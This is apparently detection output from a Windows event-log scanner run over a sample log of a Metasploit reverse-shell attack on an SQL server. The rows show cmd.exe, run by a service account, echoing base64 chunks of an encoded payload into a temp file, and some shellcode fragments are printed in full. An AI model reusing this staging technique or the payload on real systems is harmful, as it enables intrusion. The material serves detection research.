Q3lkUIM8mLUASLewS80ol9+HZiNrAcMAAAg8YMjx50FkGyxhTzyqL0X164fxEBAFv7Yl3CWgCL2UGNcv87yolwBHNPjRybjTyJweMCwZoCKwSJfQghVfyLiBwwAACLVQyLUr6NNLM7VuF1Bf9IWOsQRzwLuQUAAADmpQE5CINAuHoJ/DPHFEmJZgiJAfx1yIt9+ItQJjPJhdJ2Lo1wEDlbdAqtg8YEO1ty9OsQSjvKc91cVIgQi3LvQYkyi3AMg3EEsDtqcu//SP+LkBAQAAAzyYXSMzqNsBS3AACmPlwKw4PGBDvKcvQSJko7ynMbjZSI3hAAAItyBHqJMouwyRAAAIPCBE47zoTs/1QQEABti5AUIAAAM8lpmnaBjbAYIAAAOXR0CkHzxgQ7ynL06yZKO8pzG42UiL0gAAC9cgRBiWOLsFMgAK2DLgROO85yQP/NFHwAAIuIpDBkYTtB>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8e4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:15.748 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xed0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:16.021 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:16.295 
+09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x934 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:16.568 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb3c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:16.841 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa98 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:17.115 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb24 | User: Svc-SQL-DB01 | LID: 
0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:17.389 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x43c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:17.664 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb54 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:17.939 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3ec | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 
07:58:18.213 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb64 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:18.488 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3b8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:18.764 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9a0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:19.038 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x132c | User: Svc-SQL-DB01 | 
LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:19.311 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1084 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:19.583 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo x+sIyJOqipK4o6w44A+Fsv///+sJVWXfDqpkc3LGA3346wkmy805CdaC7xk7fSTrCXoq/AyR3Z+p2g+FNv///5DpDQAAAEOAGPBCPwsOEOS4SPxYi1gkAdOQZosMS+kIAAAA4ZF6dTR1EKmLWByQAdPpDgAAADzr22+JJD6d2vOvQtJpiwSLkAHQkOkMAAAApjTuBCYQRood+3hYkIlEJCSQ6QsAAAB0lVBKaS++djGx3VtbkGGQWVqQUekIAAAA2kGuwS1Wa+X/4OkIAAAAZ4kDrCJTk4mQWJDpCQAAAPjvPDpX5tzz81+Q6Q8AAACEMdRbvwr7DZMyxev56uFaixKQ6WD9///pCQAAAPUlzX6HtN4PzF2Q6Q8AAABwuGpzUMvE5pad0q5uc5G+GwEAAOkIAAAAfoWOrSYS922Q6Q8AAAD+0GR7iAeQMW7un57/X4tqQGgAEAAAVpDpDQAAAAUQfxQtECQH+leljZ1qAGhYpFPlkP/VicPpCwAAABDRzwj7WJYUuekXiceJ8ZDo9QAAAJDpCQAAAJ3VijUXjciCwl6Q8qTpCAAAANEGnMe8MHFO6KEAAADpCAAAACZD37TiNo/ckLvgHSoKaKaVvZ2QieiQ/9CQPAbpDAAAABAGNsMwWSS98MHinQ+MRgAAAJDpDwAAAPT9Rhy9AGSJMBUnVhTH34D74JDpCAAAAGzD5M415AjID4UaAAAAu0cTcm+Q6Q8AAADbVWp20uhp2BJ/MI81JZhqAFPpDAAAAC2gRnCgjOhn04XwHP/V6QgAAAATIH2zFQozkDHAZP8wkGSJIJDpCwAAAEFMN7ar3r5mm3QR/9PpCQAAAHCGRysfPIS5B+k9////6BX////86IIAAABgieUxwGSLUDCLUgyLUhSLcigPt0omMf+sPGF8Aiwgwc8NAcfi8lJXi1IQi0o8i0wReONIAdFRi1kgAdOLSRjjOkmLNIsB1jH/rMHPDQHHOOB19gN9+Dt9JHXkWIt
YJAHTZosMS4tYHAHTiwSLAdCJRCQkW1thWVpR/+BfX1qLEuuNXWgzMgAAaHdzMl9UaEx3JgeJ6P/QuJABAAApxFRQaCmAawD/1WoBaAoXewtoAgARXInmUFBQUEBQQFBo6g/f4P/Vl2oQVldomaV0Yf/VhcB0DP9OCHXsaPC1olb/1WoAagRWV2gC2chf/9WLNmpAaAAQAABWagBoWKRT5f/Vk1NqAFZTV2gC2chf/9UBwynGde7DgKJAAEiLAIvoDPj//13CBABADCGQkMGQkKacwgQAkJCQF4yQkCiokJBVi+yLOUmLrxSFQXQzi0257VD/FSrAQACFuXUe74uZmMBAABdqhcB1BV5dwggA/9a0gPwKAF5dwggAM8BdwggAuDtORgBdwggAkJCQkIyQkMOQ2L+QkMOQkJCQkJBFkJBViySDPUcIEABtfCNoKAdBUv8VQMBMAItFA2gxV0Bkjrpe>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb44 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:19.857 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo zgBohQecAFDoobH//zMMXcOQkJCQQ4+Q/JCQkLyQaCgHQez/FTzAQAAzwMOQkFWL7ItFCIvIgeEAAADAgfnLAADALgypAAD/P7gFAAAAdAW4xAAAql3DZpAXkJCQkKCL7EhFFFaIdXgZ2CjA09hIUDHMFFD/FZzAnwAj14lFFEVLi6Y1qU0RUVL/FSTAQIqFwHRKi6oMi00UhcB0AokIi1XAhdJ0C1Hogv///4PEpokCi5YUUP8V/cBAv8exFNq0AHO4dREBAKBdwhAAZgJz1wBaCrh2EQEAXiXCEHEkNZjAQF8s1oXAdQVeXcIQAP/WBYD8CgBeZcIaAJCQkAkL9uyLTRCLRQiFyVZ0HI10CP87xnMRi1UMigqEyegIdAlAXDvGcvLGAJReXcLLAJBViyNTIdyowXIAVleLgQhqL1f/02pcV4vw/9ODxBA7xnbVi/CMMHUO3zpX/9Mu8IOjCIUDdAqNRgFMXltdwgS0i8dfXvFdwgQAkKaQkNBJkFVSMoPsGCyLXRCF21f5QfwAAAAAfROLRQwz24PuALcJi0yYBM6FyXX3jQSdBAAAAFZQ/xVcwUAAncQEi/j124l99H5Ei0UMwiArxxVd+IkwEOsDC0V3iykwUf9JicFAAIPEBECJBotV/APQi0X4gsYESInJ/IlF+ETZzUX8jURAAaWJRfzKnlztQOaixAQzyYXbiUUNi/B+VPhFDBxN9CvBi03IiUX0iekMeV2N6wOLRQB41fJN7I1N/IlV8Ik3iwQHUY1V8J9SqehZBQAAi038i0V1K8GDxwQD8ItFDEiJRQyz5ot99FVNrItF+McEjwUAjSbG/QAr8AN3UP8VIMFAQHpN+IPE/TsAD/AxK8GL10k0att+NosUhwNrshSHq2jD/fOLTQgSbIk5X1uL5V3Di1XyHsOJOl9biytdw4tFCIk4oMOiW8blucNkkJCQYFWL7KHc3UUAVpzAVw+F6QEA/2j4B0EAxwX4B0GelAAAAP8VIMBAAK
H0CEEAg/gCD4W0AQAAoAwIQQC+kXxYADAbdDuLPUDBQAChdMFAAIM4RX4OM8mK4IoOUf/Xw44I6xGheMFA4zPSihaLCIoEUYPgEdvAdTaKRgHrhMB1y4sNtwgEAKH8tEEAg/ihD4JfAQAuD4RZARIAgwoEdWWD+VZzI7goAAA/6UoBAACAPgB0zVb/FajBQMqLyIPE7YkN4AgFAOu/d9u4rwAbAOklAQAAgPkDdze4K2YAAOm7AQAAg/kEdwq4LEQAAOkHATYAuiIAAL3C0RvAwGODwC3p9AAAlYP4BXVVoZzIQQCFwHUeqcl1/rgyAOAAA9gAAAAzwAf5Wg+VwINDM+nIE6QAg/gCegpNBwDdAOlyAAAAg/kBxAp6PFkAAOmqAAAAM8CD+YyhlRiDwD3pmgBfAIOXXPfYG8Ak9oM0UEqJQwAAg/gBdX+jjtb/AL52CFsAhMB0O4s9aMFA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x109c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:20.131 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x870 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:20.404 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x370 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:20.678 
+09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13b4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:20.951 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xcf8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:21.224 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AAAAAAAA9gAAeAAAAAAAAAAAAAAAAAAAAAC87QAAAAAA7wAAAAAAAAAAAAAAAAAAAAAAAAAAAI8AAAAAAAAAAAAAAAAAAL4AAAAhAAAAAAC7ADAAAAAANAAAAAAAqAAAAAAA+wAAACMAAAA9AAAAAAB3AAAAAAAAAAAAACwAAADRB6EAAAAAAAAAqwAA7OGiAAAAAAAAAAAAAAAAAOMAAAAAAAAAAAAAAAAAAAAAAFEAAABqAAAAfwC7AAAAAAAAAAAAAAAAAAAAM2cAAOkAAAAAXQAAAADvAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAALQAAAAAAAAAAAADNAAAAAAAAAAAAAAAAAAAhAAAAAG9eAAAAGQAAAAAAAAAgACsAAAAAARoAAAAAfAAAAEo6AAAAAEW+AH8AAAAAAADcAACFAAAAAAAAAAAAAADsAAAAdwAAAAAAAADuNgAAqgAAAAAAAAAAAHAAAMOHVWQAZmEAAAAAAAApALAAAD/8AAAAAADaAAAAAIQAAAAAaAAAAAAAAAAAAAAATQAAAAAAANdHAAAAiQDCAAAAAAAAAAAAAAAAAOkqAACBAAAAAMEAAAAAAAAAAAAAAAAAAAAAoAAAAABEAAAAAACAYTAAAAAAAAAAAAAA8ADDqtUAAAAAAAAATQAAAD8AAAAAAAAAAADUAAAAAAAAAPIAAAAAAADo4wAAAKQAAAAAAAAAACiYAAAA9osALQAAAAAAALYAAAAAAOEAAADjLwAaAAAAAAAAAI0AAAANAP4AAAAAAPthAAAAswBjAAAAVwAAAAAAAAAAAAAAAAAAAAAAALoAAAD5AABKAAAAAABsAAAAAAAAAAAAAAAAAADyAAAAAAAAAAAAvQAAAAAAAF4AAAAAAAAAAAAAzQAAAAAqAAAAXAB2owAAAAAAAABHugDXAAAAAAAXAAAATAAJKwAAAABuAPAAhgAAAACpvQAAAPiAAAAAAAAArgAAAAAAAADbAAAAALsAAOUAAAAAAHIAAAAAAJIAAAAAAt4AoQDuAFUAAAAAAAAA+QDoAAAAAAAAiQBLAAAAIwAAMAAAAAAAAEAVAOwAAADpAAAADCsAAOkAAAAAAAAAAAAAAADGAAAAAAAAaAAAAAAAAFkAAAAAAADsAAAAExIAAAAAAK0AAAAAAAAAAAAoAAAAcTkAAACyAABgAMIAADcAAAB3AAAAAAAAADYAAAAAAAAAAAAAAIxUYVgAAAAAAAAAAAAAAACtAAAAAAAAAADNAGoAAAAAAAAAAAAAAABtAFgAAAAAAAAAAAAAAAAAAAAPAG0AAABUAAAAAAAAAAAAAAAAAAAAQwAAAAAAAAAAAAAAAAAPAAAA4QCfAAAAAAAAAACBAAAAUAAAAAAAAAAAAAAAAAAAAPMA/gCRAAAAAgAAALaYNwCQAAAAGgAAW6QAPF0AAAAAAAAAAAAAAAAAAMEAWJIAABwAAABs>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x824 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:21.498 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xea0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:21.772 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:22.047 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x121c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:22.320 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: Svc-SQL-DB01 | LID: 
0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:22.593 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x20 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:22.867 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:23.140 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 
07:58:23.414 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x82c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:23.687 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo JXM+PHRoICVzPiZuYnNwOzwvdGg+IDx0aCAlcz5taW48L3RoPiAgIDx0aCAlcz5hdmc8L3RoPiAgIDx0aCAlcz5tYXg8L3RoPjwvdHI+CgA8dHIgJXM+PHRoICVzIGNvbHNwYW49ND5Db25ubmVjdGlvbiBUaW1lcyAobXMpPC90aD48L3RyPgoAAAA8dHIgJXM+PHRkIGNvbHNwYW49MiAlcz4mbmJzcDs8L3RkPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZiBrYi9zIHRvdGFsPC90ZD48L3RyPgoAADx0ciAlcz48dGQgY29sc3Bhbj0yICVzPiZuYnNwOzwvdGQ+PHRkIGNvbHNwYW49MiAlcz4lLjJmIGtiL3Mgc2VudDwvdGQ+PC90cj4KAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+VHJhbnNmZXIgcmF0ZTo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZiBrYi9zIHJlY2VpdmVkPC90ZD48L3RyPgoAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+UmVxdWVzdHMgcGVyIHNlY29uZDo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZjwvdGQ+PC90cj4KAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkhUTUwgdHJhbnNmZXJyZWQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkIGJ5dGVzPC90ZD48L3RyPgoAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5Ub3RhbCBQVVQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkPC90ZD48L3RyPgoAAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlRvdGFsIFBPU1RlZDo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JUk2NGQ8L3RkPjwvdHI+CgAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+VG90YWwgdHJhbnNmZXJyZWQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkIGJ5dGVzPC90ZD48L3RyPgoAADx0ciAl